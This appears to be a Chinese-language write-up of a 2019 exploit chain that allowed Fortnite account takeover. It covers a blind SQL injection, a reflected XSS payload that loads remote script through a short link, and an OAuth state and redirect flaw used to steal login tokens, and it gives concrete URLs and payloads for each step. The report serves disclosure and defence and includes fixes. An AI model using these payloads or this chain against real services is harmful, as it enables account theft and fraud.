攻击Epic Games接管堡垒之夜账户
字数 1342 2025-08-27 12:33:42
Epic Games堡垒之夜账户接管漏洞分析报告
漏洞概述
本报告详细分析了Epic Games堡垒之夜游戏平台中发现的多个安全漏洞,这些漏洞可导致攻击者接管任意玩家账户。漏洞链包括SQL注入、跨站脚本攻击(XSS)和OAuth认证缺陷,最终实现无需用户凭证即可完全控制目标账户。
漏洞发现时间线
- 发现时间:2019年1月前
- 报告时间:2019年初
- 修复时间:报告后已修复
技术细节分析
1. SQL注入漏洞
漏洞位置:http://ut2004stats.epicgames.com/serverstats.php
漏洞特征:
- 参数
server存在SQL注入 - 服务器使用MySQL数据库
- 存在WAF但采用黑名单过滤机制
利用方法:
- 使用
if((SUBSTR(query, from, length)=CHAR([char_number])), true, false)条件判断 - 通过响应包长度差异判断查询结果(4014字节为假,12609字节为真)
- 使用系统变量
@@version绕过WAF限制
示例利用:
http://ut2004stats.epicgames.com/serverstats.php?server=if((SUBSTR(@@version,1,1)=CHAR(53)),37514065,0)
2. 跨站脚本攻击(XSS)
漏洞位置:http://ut2004stats.epicgames.com/index.php?stats=maps
注入点:SearchName参数
Payload示例:
http://ut2004stats.epicgames.com/index.php?stats=maps&SearchName="><script src='//bit.ly/2QlSHBO'></script>
特点:
- 反射型XSS
- 位于epicgames.com子域名,可绕过同源策略限制
- 可通过短链接绕过WAF对长URL的限制
3. OAuth认证缺陷
漏洞位置:Epic Games SSO系统
核心问题:
redirectUrl参数可控且未严格验证state参数未经验证直接使用- 可重定向至包含XSS的Epic Games子域名
攻击流程:
- 构造恶意
state参数(包含Base64编码的JSON)
{
"isPopup": "true",
"isCreateFlow": "true",
"isWeb": "true",
"oauthRedirectUrl": "http://ut2004stats.epicgames.com/index.php?stats=maps&SearchName=\"\"><script src='//bit.ly/2QlSHBO'></script>"
}
- 通过SSO提供商(如Facebook)发起认证请求
https://www.facebook.com/dialog/oauth?client_id=1132078350149238&redirect_uri=https://accounts.epicgames.com/OAuthAuthorized&state=[Base64_encoded_state]&response_type=code&display=popup&scope=email,public_profile,user_friends
- 认证成功后,服务器将用户重定向至包含XSS的页面
- XSS执行窃取OAuth令牌
4. 完整攻击链
- 诱导用户点击恶意链接(通过社交工程)
- 用户被重定向至SSO登录页面
- 用户完成SSO认证
- 服务器将用户重定向至包含XSS的页面
- XSS执行并窃取OAuth令牌
- 攻击者使用令牌登录受害者账户
漏洞影响
- 账户完全接管:查看个人信息、购买记录等
- 虚拟货币盗窃:可购买V-Bucks等游戏内货币
- 隐私泄露:获取用户真实姓名、地址、支付信息等
- 聊天窃听:可访问游戏内聊天内容
修复建议
-
输入验证:
- 对所有用户输入进行严格验证
- 对
redirectUrl和state参数实施白名单机制
-
XSS防护:
- 实施内容安全策略(CSP)
- 对所有输出进行HTML编码
-
SQL注入防护:
- 使用参数化查询
- 升级WAF规则
-
OAuth增强:
- 验证
state参数完整性 - 限制重定向URL范围
- 验证
-
子域名管理:
- 定期审计老旧子域名
- 统一安全标准
攻击演示视频
总结
此漏洞链展示了现代Web应用安全中的典型问题组合:遗留系统漏洞、输入验证不足和认证流程缺陷。攻击者通过精心构造的攻击链,无需用户凭证即可完全接管账户,凸显了纵深防御和安全开发生命周期的重要性。